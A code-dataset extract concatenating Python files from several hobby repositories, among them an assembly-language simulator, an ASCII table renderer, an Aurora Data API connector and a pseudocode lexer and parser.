data = p.communicate()
split_data = data[0].split()
ipaddr = split_data[split_data.index('src')+1]
my_ip = 'Your ip is %s' % ipaddr
print my_ip
strcurtime = time.strftime('%Y-%m-%dT%H:%M:%S',time.localtime(time. time()))
Subject = 'IP For RaspberryPi on %s' % strcurtime + ': ' + ipaddr
sm(receiver, Subject, my_ip);
``` |
{
"source": "johnyob/Alexa-Skills",
"score": 2
} |
#### File: alexa_skills/responses/Reprompt.py
```python
class Reprompt:
def __init__(self, text):
self._type = "PlainText"
self._text = text
def build(self):
return {
"outputSpeech": {
"type": self._type,
"text": self._text
}
}
``` |
{
"source": "johnyob/aqa-assembly-simulator",
"score": 2
} |
#### File: commands/config/Show.py
```python
from ascii_table import Table
from aqa_assembly_simulator.virtual_machine.config.VirtualMachineConfig import VirtualMachineConfig
from aqa_assembly_simulator.helpers.Util import SortedDictionary
from aqa_assembly_simulator.commands.Command import Command
class Show(Command):
def run(self):
"""
Return method for config show command
:return: (None)
"""
config = SortedDictionary(VirtualMachineConfig.get_config())
print("\nVirtual Machine Config")
print(Table([config.names(), config.values()]))
```
#### File: aqa_assembly_simulator/error/VirtualMachineError.py
```python
from aqa_assembly_simulator.error.RuntimeError import RuntimeError
class VirtualMachineError(RuntimeError):
def __init__(self, token, message):
super().__init__(token, message)
def report(self):
return "[ERROR] Error: AssemblySimulatorVMError, Response: ({0})".format(super().report())
```
#### File: aqa_assembly_simulator/parser/Statement.py
```python
from abc import ABC as Abstract, abstractmethod
class StatementVisitor(Abstract):
"""
Abstract class.
Used to traverse the abstract syntax tree produced by the parser.
"""
@abstractmethod
def visit_load_statement(self, statement):
pass
@abstractmethod
def visit_store_statement(self, statement):
pass
@abstractmethod
def visit_add_statement(self, statement):
pass
@abstractmethod
def visit_subtract_statement(self, statement):
pass
@abstractmethod
def visit_move_statement(self, statement):
pass
@abstractmethod
def visit_compare_statement(self, statement):
pass
@abstractmethod
def visit_branch_statement(self, statement):
pass
@abstractmethod
def visit_branch_equal_statement(self, statement):
pass
@abstractmethod
def visit_branch_not_equal_statement(self, statement):
pass
@abstractmethod
def visit_branch_greater_than_statement(self, statement):
pass
@abstractmethod
def visit_branch_less_than_statement(self, statement):
pass
@abstractmethod
def visit_and_statement(self, statement):
pass
@abstractmethod
def visit_or_statement(self, statement):
pass
@abstractmethod
def visit_eor_statement(self, statement):
pass
@abstractmethod
def visit_not_statement(self, statement):
pass
@abstractmethod
def visit_left_shift_statement(self, statement):
pass
@abstractmethod
def visit_right_shift_statement(self, statement):
pass
@abstractmethod
def visit_halt_statement(self):
pass
@abstractmethod
def visit_label_statement(self, statement):
pass
class Statement(Abstract):
"""
Parent class of the Statement class.
Inherited by all statement objects.
"""
@abstractmethod
def accept(self, visitor):
pass
class Load(Statement):
def __init__(self, tokens):
"""
Load statement constructor
:param tokens: (|tokens| = 2) (list)
"""
self._register, self._direct_address = tokens
def get_register(self):
"""
Returns register operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register
def get_direct_address(self):
"""
Returns direct address (memory reference) operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._direct_address
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_load_statement(self)
def __repr__(self):
"""
Returns string representation of load statement
:return: (string)
"""
return "LDR {0}, {1}".format(self._register, self._direct_address)
class Store(Statement):
def __init__(self, tokens):
"""
Store statement constructor
:param tokens: (|tokens| = 2) (list)
"""
self._register, self._direct_address = tokens
def get_register(self):
"""
Returns register operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register
def get_direct_address(self):
"""
Returns direct address (memory reference) operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._direct_address
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_store_statement(self)
def __repr__(self):
"""
Returns string representation of store statement
:return: (string)
"""
return "STR {0}, {1}".format(self._register, self._direct_address)
class Add(Statement):
def __init__(self, tokens):
"""
Add statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_add_statement(self)
def __repr__(self):
"""
Returns string representation of add statement
:return: (string)
"""
return "ADD {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Subtract(Statement):
def __init__(self, tokens):
"""
Subtract statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_subtract_statement(self)
def __repr__(self):
"""
Returns string representation of subtract statement
:return: (string)
"""
return "SUB {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Move(Statement):
def __init__(self, tokens):
"""
Move statement constructor
:param tokens: (|tokens| = 2) (list)
"""
self._register_d, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_move_statement(self)
def __repr__(self):
"""
Returns string representation of move statement
:return: (string)
"""
return "MOV {0}, {1}".format(self._register_d, self._operand)
class Compare(Statement):
def __init__(self, tokens):
"""
Compare statement constructor
:param tokens: (|tokens| = 2) (list)
"""
self._register_d, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_compare_statement(self)
def __repr__(self):
"""
Returns string representation of compare statement
:return: (string)
"""
return "CMP {0}, {1}".format(self._register_d, self._operand)
class Branch(Statement):
def __init__(self, tokens):
"""
Branch statement constructor
:param tokens: (|tokens| = 1) (list)
"""
self._label = tokens[0]
def get_label(self):
"""
Returns label operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._label
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_branch_statement(self)
def __repr__(self):
"""
Returns string representation of branch statement
:return: (string)
"""
return "B {0}".format(self._label)
class BranchEqual(Statement):
def __init__(self, tokens):
"""
Branch equal statement constructor
:param tokens: (|tokens| = 1) (list)
"""
self._label = tokens[0]
def get_label(self):
"""
Returns label operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._label
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_branch_equal_statement(self)
def __repr__(self):
"""
Returns string representation of branch equal statement
:return: (string)
"""
return "BEQ {0}".format(self._label)
class BranchNotEqual(Statement):
def __init__(self, tokens):
"""
Branch not equal statement constructor
:param tokens: (|tokens| = 1) (list)
"""
self._label = tokens[0]
def get_label(self):
"""
Returns label operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._label
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_branch_not_equal_statement(self)
def __repr__(self):
"""
Returns string representation of branch not equal statement
:return: (string)
"""
return "BNE {0}".format(self._label)
class BranchGreaterThan(Statement):
def __init__(self, tokens):
"""
Branch greater than statement constructor
:param tokens: (|tokens| = 1) (list)
"""
self._label = tokens[0]
def get_label(self):
"""
Returns label operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._label
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_branch_greater_than_statement(self)
def __repr__(self):
"""
Returns string representation of branch greater than statement
:return: (string)
"""
return "BGT {0}".format(self._label)
class BranchLessThan(Statement):
def __init__(self, tokens):
"""
Branch less than statement constructor
:param tokens: (|tokens| = 1) (list)
"""
self._label = tokens[0]
def get_label(self):
"""
Returns label operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._label
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_branch_less_than_statement(self)
def __repr__(self):
"""
Returns string representation of branch less than statement
:return: (string)
"""
return "BLT {0}".format(self._label)
class And(Statement):
def __init__(self, tokens):
"""
And statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_and_statement(self)
def __repr__(self):
"""
Returns string representation of and statement
:return: (string)
"""
return "AND {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Or(Statement):
def __init__(self, tokens):
"""
Or statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_or_statement(self)
def __repr__(self):
"""
Returns string representation of or statement
:return: (string)
"""
return "ORR {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Eor(Statement):
def __init__(self, tokens):
"""
Xor statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_eor_statement(self)
def __repr__(self):
"""
Returns string representation of xor statement
:return: (string)
"""
return "EOR {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Not(Statement):
def __init__(self, tokens):
"""
Not statement constructor
:param tokens: (|tokens| = 2) (list)
"""
self._register_d, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_not_statement(self)
def __repr__(self):
"""
Returns string representation of not statement
:return: (string)
"""
return "MVN {0}, {1}".format(
self._register_d, self._operand
)
class LeftShift(Statement):
def __init__(self, tokens):
"""
Logical left shift statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_left_shift_statement(self)
def __repr__(self):
"""
Returns string representation of logical left shift statement
:return: (string)
"""
return "LSL {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class RightShift(Statement):
def __init__(self, tokens):
"""
Logical right shift statement constructor
:param tokens: (|tokens| = 3) (list)
"""
self._register_d, self._register_n, self._operand = tokens
def get_register_d(self):
"""
Returns register_d operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_d
def get_register_n(self):
"""
Returns register_n operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._register_n
def get_operand(self):
"""
Returns <operand 2> operand
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._operand
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_right_shift_statement(self)
def __repr__(self):
"""
Returns string representation of logical right shift statement
:return: (string)
"""
return "LSR {0}, {1}, {2}".format(
self._register_d, self._register_n, self._operand
)
class Halt(Statement):
def __init__(self, tokens):
"""
Halt statement constructor
:param tokens: (|tokens| = 0) (list)
"""
pass
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_halt_statement()
def __repr__(self):
"""
Returns string representation of halt statement
:return: (string)
"""
return "HALT"
class Label(Statement):
def __init__(self, identifier):
"""
Label statement constructor
:param identifier: label identifier (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
self._identifier = identifier
def get_identifier(self):
"""
Returns the identifier of the label
:return: (aqa_assembly_simulator.lexer.TokenType.TokenType)
"""
return self._identifier
def accept(self, visitor):
"""
Traversal method.
Used to process of the node of abstract syntax tree.
:param visitor: visitor class (sub-class of the StatementVisitor class)
:return:
"""
return visitor.visit_label_statement(self)
def __repr__(self):
"""
Returns string representation of the label statement
:return: (string)
"""
return "{0}:".format(self._identifier)
```
#### File: aqa_assembly_simulator/virtual_machine/Memory.py
```python
from ascii_table import Table
from aqa_assembly_simulator.error.VirtualMachineError import VirtualMachineError
class Memory:
def __init__(self, capacity):
"""
Memory constructor.
Constructs _memory using a list comprehension.
:param capacity: number of addressable memory units (integer)
"""
self._capacity = capacity
self._memory = [
0 for address in range(capacity)
]
def __getitem__(self, address):
"""
Returns data stored at memory address :param address.
If :param address out of index range -> virtual machine error is raised.
:param address: address index (0 <= a < n) (integer)
:return: (integer)
"""
if not 0 <= address.get_literal() < self._capacity:
raise VirtualMachineError(address, "Address index out of range")
return self._memory[address.get_literal()]
def __setitem__(self, address, value):
"""
Sets the value stored in address :param address to :param value.
If :param address out of index range -> virtual machine error raised.
:param address: address index (0 <= a < n) (integer)
:param value: (integer)
:return: (None)
"""
if not 0 <= address.get_literal() < self._capacity:
raise VirtualMachineError(address, "Address index out of range")
self._memory[address.get_literal()] = int(value)
def __repr__(self):
"""
Returns string representation of the memory unit using an ascii_table.Table object
:return: (string)
"""
return str(Table([
{
"Header": "Addresses",
"Contents": list(map(str, range(self._capacity)))
},
{
"Header": "Values",
"Contents": list(map(str, self._memory))
}
]))
``` |
{
"source": "johnyob/ascii-table",
"score": 3
} |
#### File: ascii-table/ascii_table/Table.py
```python
from functools import reduce
from ascii_table.Column import Column
class Table:
def __init__(self, contents):
self._header = Column(None, contents).get_header()
self._columns = [{
"Column": column,
"Width": max(map(lambda x: sum(map(len, x)), column.get_rows())),
"Number Of Columns": max(map(len, column.get_rows())),
"Height": len(column.get_rows())
} for column in self._header.get_children()
]
assert len(set(map(lambda x: x["Height"], self._columns))) == 1
self._height = self._columns[0]["Height"]
def __repr__(self):
return "\n".join(self._get_rows())
def _get_row(self, row_index):
for column in self._columns:
cells = column["Column"].get_rows()[row_index]
padding = column["Number Of Columns"] - len(cells)
cell_length = (column["Width"] // len(cells)) + padding
for cell in cells:
yield (cell.format(cell_length), padding + 1, cell.is_header())
def _join_cells(self, character, cells):
cells = map(lambda x: (x[1] * " ") + x[0] + (x[1] * " "), cells)
return " " + character + character.join(cells) + character
def _join_lines(self, character, lines):
lines = map(lambda x: (x[1] * x[2]) + x[0] + (x[1] * x[2]), lines)
return " " + character + character.join(lines) + character
def _get_line(self, row):
for cell in row:
character = "-" if cell[2] else " "
yield (character * (len(cell[0])), cell[1], character)
def _format_row(self, row_index):
row = list(self._get_row(row_index))
yield self._join_cells("|", row)
if True in map(lambda x: x[2], row):
yield self._join_lines("+", self._get_line(row))
def _get_rows(self):
yield self._join_lines("+", self._get_line(self._get_row(0)))
for row in range(self._height):
yield "\n".join(self._format_row(row))
yield self._join_lines("+", self._get_line(
map(lambda x: (x[0], x[1], True), self._get_row(-1))
))
``` |
{
"source": "johnyob/Aurora-Connector",
"score": 3
} |
#### File: aurora_connector/helpers/Utils.py
```python
from typing import List, Optional, Dict, Any, Union, Callable
import re
from dateutil.parser import parse as from_iso
from aurora_connector.helpers.Exceptions import AuroraParameterException, AuroraDatabaseException
DATATYPE_MAPPING = {
"VARCHAR": str,
"CHAR": str,
"BINARY": bytes,
"VARBINARY": bytes,
"TINYBLOB": bytes,
"TINYTEXT": str,
"TEXT": str,
"BLOB": bytes,
"MEDIUMTEXT": str,
"MEDIUMBLOB": str,
"LONGTEXT": str,
"LONGBLOB": str,
"BIT": bytes,
"TINYINT": int,
"BOOL": bool,
"BOOLEAN": bool,
"SMALLINT": int,
"MEDIUMINT": int,
"INT": int,
"INTEGER": int,
"BIGINT": int,
"FLOAT": float,
"DOUBLE": float,
"DECIMAL": float,
"DEC": float,
"DATETIME": from_iso
}
def format_field(field: Dict[str, Any]) -> Any:
"""
Returns the value of the field dictionary returned by the Data API.
The field dictionary has the following structure:
field = {
value_name: value
},
where value_name in {"stringValue", "blobValue", ...}
:param field: (dict)
:return: (Any)
"""
datatype_identifier, value = list(field.items())[0]
if datatype_identifier == "blobValue":
return bytes(value)
if datatype_identifier == "booleanValue":
return bool(value)
if datatype_identifier == "isNull":
if value:
return None
if datatype_identifier == "longValue":
return int(value)
if datatype_identifier == "stringValue":
return str(value)
raise AuroraDatabaseException({
"message": "Unsupported query result field datatype.",
"field_value": value,
"supported_types": [
bytes, bool, float, int, str, None
]
})
def cast_field(field_value: Any, column_type: Callable) -> Any:
"""
Returns the casted field value according to the DATATYPE_MAPPING above
:param field_value: value of the field (Any)
:param column_type: class constructor / function that casts the datatype to the correct type (Callable)
:return: (Any)
"""
if field_value is None:
return field_value
return column_type(field_value)
def format_record(record: List[Dict[str, Any]], column_types: List[Callable]) -> List[Any]:
"""
Returns the formatted record with correct typing.
:param record: A list with the following format:
record = [
{
value_name: value
},
.
.
.
]
where value_name = "stringValue", "blobValue", etc
(See format_value for more information)
:param column_types: A list of datatype constructors where the constructor stored at position i
relates to the datatype in position i stored in the record. (list)
:return: (list)
"""
return [cast_field(format_field(field), column_type) for field, column_type in zip(record, column_types)]
def get_column_type(column_type: str) -> Callable:
"""
Returns the related data type constructor for the MySQL database with name :param column_type:
:param column_type: Column type name. e.g. VARCHAR, etc (string)
:return: (callable)
"""
if column_type not in DATATYPE_MAPPING:
raise AuroraDatabaseException({
"message": "Unsupported column type in result set.",
"column_type": column_type
})
return DATATYPE_MAPPING.get(column_type)
def get_column_types(column_metadata: List[Dict]) -> List[Callable]:
"""
Parses column_metadata to extract the column types.
Returns a list of callables, where each callable is the data type constructor for the related column type.
This allows us to parse column types such as DATETIME which aren't supported by the data api
:param column_metadata: The columnMetadata returned from the data API (list)
:return: (list)
"""
return [
get_column_type(column.get("typeName")) for column in column_metadata
]
def format_response(response: Dict) -> List[List]:
"""
:param response: Response dictionary from data api for a query.
:return: (list)
"""
column_types = get_column_types(response.get("columnMetadata"))
records = response.get("records")
return [format_record(record, column_types) for record in records]
def format_value(value: Any) -> Dict[str, Any]:
"""
Returns value of an sql parameter according to the data api requirements.
:param value: value of parameter (Any)
:return: (dict)
"""
if isinstance(value, bytes):
return {"blobValue": value}
if isinstance(value, bool):
return {"booleanValue": value}
if isinstance(value, float):
return {"doubleValue": value}
if value is None:
return {"isNull": True}
if isinstance(value, int):
return {"longValue": value}
if isinstance(value, str):
return {"stringValue": value}
raise AuroraParameterException({
"message": "Unsupported parameter datatype.",
"parameter_value": value,
"supported_types": [
bytes, bool, float, int, str, None
]
})
def format_sql_parameters(sql_parameters: Dict[str, Any]) -> List[Dict[str, Union[str, Dict[str, Any]]]]:
"""
Formats the sql parameters according to the data api requirements.
:param sql_parameters: A dictionary with the following format:
sql_parameters = {
parameter_name: value,
.
.
.
}
:return: (list)
"""
return [
{"name": name, "value": format_value(value)} for name, value in sql_parameters.items()
]
def format_sql_query(sql: str, page: int, per_page: int) -> str:
"""
Formats an sql query with the required limit and offset.
:param sql: original sql query (string)
:param page: number of the current page (int)
:param per_page: number of records per page (int)
:return: (str)
"""
terminator_regex = r";"
limit_string = " LIMIT {} OFFSET {};".format(per_page, per_page * (page-1))
if not re.search(terminator_regex, sql):
return sql + limit_string
return re.sub(terminator_regex, limit_string, sql)
def fetch_one(result_set: List[List]) -> Optional[List]:
"""
Returns the first record returned from a query.
If the result set is empty then None is returned
:param result_set: a list of records returned from AuroraDatabase.query (list)
:return: (list|None)
"""
return result_set[0] if result_set else None
``` |
{
"source": "johnyob/Pseudo",
"score": 3
} |
#### File: pyPseudo/lexer/Lexer.py
```python
from pyPseudo.error.ScanError import ScanError
from pyPseudo.lexer.Token import Token
from pyPseudo.lexer.TokenType import TokenType, keywords
class Lexer:
def __init__(self, source, path):
self._source = source
self._path = path
self._tokens = []
self._errors = []
self._start = 0
self._current = 0
self._line = 1
def scanTokens(self):
while not self._isAtEnd():
self._start = self._current
self._scanToken()
self._tokens.append(Token(TokenType.EOF, "", None, self._path, self._line))
return self._tokens
def getErrors(self):
return self._errors
def _case(self, character, comparableCharacter):
return character == comparableCharacter
def _scanToken(self):
character = self._move()
if self._case(character, "("):
self._addToken(TokenType.LEFT_PAREN)
elif self._case(character, ")"):
self._addToken(TokenType.RIGHT_PAREN)
elif self._case(character, "["):
self._addToken(TokenType.LEFT_SQUARE)
elif self._case(character, "]"):
self._addToken(TokenType.RIGHT_SQUARE)
elif self._case(character, "{"):
self._addToken(TokenType.LEFT_BRACE)
elif self._case(character, "}"):
self._addToken(TokenType.RIGHT_BRACE)
elif self._case(character, ","):
self._addToken(TokenType.COMMA)
elif self._case(character, "."):
self._addToken(TokenType.DOT)
elif self._case(character, "-"):
self._addToken(TokenType.MINUS)
elif self._case(character, "+"):
self._addToken(TokenType.PLUS)
elif self._case(character, ";"):
#self._addToken(TokenType.SEMICOLON)
pass
elif self._case(character, "*"):
self._addToken(TokenType.STAR)
elif self._case(character, "<"):
self._addToken(
TokenType.LEFT_ARROW if self._match("-") else TokenType.LESS_EQUAL \
if self._match("=") else TokenType.NOT_EQUAL if self._match(">") else \
TokenType.LESS
)
elif self._case(character, ">"):
self._addToken(
TokenType.GREATER_EQUAL if self._match("=") else TokenType.GREATER
)
elif self._case(character, "="):
self._addToken(TokenType.EQUAL)
elif self._case(character, "/"):
if self._match("/"):
while self._peek() != "\n" and not self._isAtEnd():
self._move()
else:
self._addToken(TokenType.SLASH)
elif self._case(character, " "):
pass
elif self._case(character, "\r"):
pass
elif self._case(character, "\t"):
pass
elif self._case(character, "\n"):
self._line += 1
elif self._case(character, "\""):
self._string()
else:
if self._isDigit(character):
self._number()
elif self._isAlpha(character):
self._identifier()
else:
self._error(self._path, self._line, "Unexpected character")
def _identifier(self):
while not self._isAtEnd() and self._isAlphaNumeric(self._peek()):
self._move()
text = self._source[self._start : self._current]
token = keywords.get(text, TokenType.IDENTIFIER)
self._addToken(token)
def _number(self):
while not self._isAtEnd() and self._isDigit(self._peek()):
self._move()
if self._peek() == "." and self._isDigit(self._peekNext()):
self._move()
while self._isDigit(self._peek()):
self._move()
literal = float(self._source[self._start : self._current])
self._addTokenLiteral(TokenType.NUMBER, literal)
def _string(self):
while self._peek() != "\"" and not self._isAtEnd():
if self._peek() == "\n":
self._line += 1
self._move()
if self._isAtEnd():
self._error("Unterminated string")
return
self._move()
literal = self._source[self._start + 1 : self._current - 1]
self._addTokenLiteral(TokenType.STRING, literal)
def _match(self, expected):
if self._isAtEnd():
return False
if self._source[self._current] != expected:
return False
self._current += 1
return True
def _peekNext(self):
if self._current + 1 >= len(self._source):
return '\0'
return self._source[self._current + 1]
def _peek(self):
if self._isAtEnd():
return '\0'
return self._source[self._current]
def _move(self):
self._current += 1
return self._source[self._current - 1]
def _addToken(self, type):
self._addTokenLiteral(type, None)
def _addTokenLiteral(self, type, literal):
lexeme = self._source[self._start : self._current]
self._tokens.append(Token(type, lexeme, literal, self._path, self._line))
def _isDigit(self, character):
return character.isdigit()
def _isAlpha(self, character):
return character.isalpha()
def _isAlphaNumeric(self, character):
return self._isDigit(character) or self._isAlpha(character)
def _isAtEnd(self):
return self._current >= len(self._source)
def _error(self, message):
self._errors.append(ScanError(self._path, self._line, message))
```
#### File: pyPseudo/parser/Parser.py
```python
from pyPseudo.error.ParseError import ParseError
from pyPseudo.lexer.Lexer import Lexer
from pyPseudo.lexer.Token import Token
from pyPseudo.lexer.TokenType import TokenType
from pyPseudo.Utilities import readFile
import pyPseudo.parser.Expression as Expression
import pyPseudo.parser.Statement as Statement
class Parser:
def __init__(self, tokens):
self._current = 0
self._tokens = tokens
self._errors = []
def parse(self):
statements = []
while not self._isAtEnd():
statements.append(self._declaration())
return statements
def getErrors(self):
return self._errors
def _declaration(self):
try:
if self._match([TokenType.IMPORT]):
self._importModule()
if self._match([TokenType.CLASS]):
return self._classDeclaration()
if self._match([TokenType.FUNCTION]):
return self._functionDeclaration()
if self._match([TokenType.VAR]):
return self._variableDeclaration()
return self._statement()
except ParseError as e:
self._synchronise()
return None
def _importModule(self):
path = self._consume(TokenType.STRING, "Expect file path for module.").getLiteral()
#self._consume(TokenType.SEMICOLON, "Expect ';' after file path for module.")
lexer = Lexer(readFile(path), path)
moduleTokens = lexer.scanTokens()
del moduleTokens[-1]
self._tokens = self._tokens[ : self._current] + moduleTokens + self._tokens[self._current : ]
def _classDeclaration(self):
identifier = self._consume(TokenType.IDENTIFIER, "Expect class identifier.")
superClass = None
if self._match([TokenType.INHERITS]):
self._consume(TokenType.IDENTIFIER, "Expect superclass identifier.")
superClass = Expression.Variable(self._previous())
methods = []
while not self._check(TokenType.ENDCLASS) and not self._isAtEnd():
if self._match([TokenType.FUNCTION]):
methods.append(self._functionDeclaration())
self._consume(TokenType.ENDCLASS, "Expect 'ENDCLASS' after class body.")
return Statement.Class(identifier, superClass, methods)
def _functionDeclaration(self):
identifier = self._consume(TokenType.IDENTIFIER, "Expect function identifier.")
self._consume(TokenType.LEFT_PAREN, "Expect '(' after function identifier.")
parameters = []
if not self._check(TokenType.RIGHT_PAREN):
while True:
if len(parameters) >= 8:
self._error(self._peek(), "Cannot have more than 8 parameters.")
parameters.append(self._consume(TokenType.IDENTIFIER, "Expect parameter identifier."))
if not self._match([TokenType.COMMA]):
break
self._consume(TokenType.RIGHT_PAREN, "Expect ')' after parameters.")
body = self._bodyDeclaration(TokenType.ENDFUNCTION)
self._consume(TokenType.ENDFUNCTION, "Expect 'ENDFUNCTION' at the end of the function.")
return Statement.Function(identifier, parameters, body)
def _bodyDeclaration(self, terminator):
body = []
while not self._check(terminator) and not self._isAtEnd():
body.append(self._declaration())
return body
def _variableDeclaration(self):
identifier = self._consume(TokenType.IDENTIFIER, "Expect variable identifier.")
initializer = None
if self._match([TokenType.LEFT_ARROW]):
initializer = self._expression()
#self._consume(TokenType.SEMICOLON, "Expect ';' after variable declaration.")
return Statement.Variable(identifier, initializer)
def _statement(self):
if self._match([TokenType.FOR]):
return self._forStatement()
if self._match([TokenType.IF]):
return self._ifStatement()
if self._match([TokenType.OUTPUT]):
return self._outputStatement()
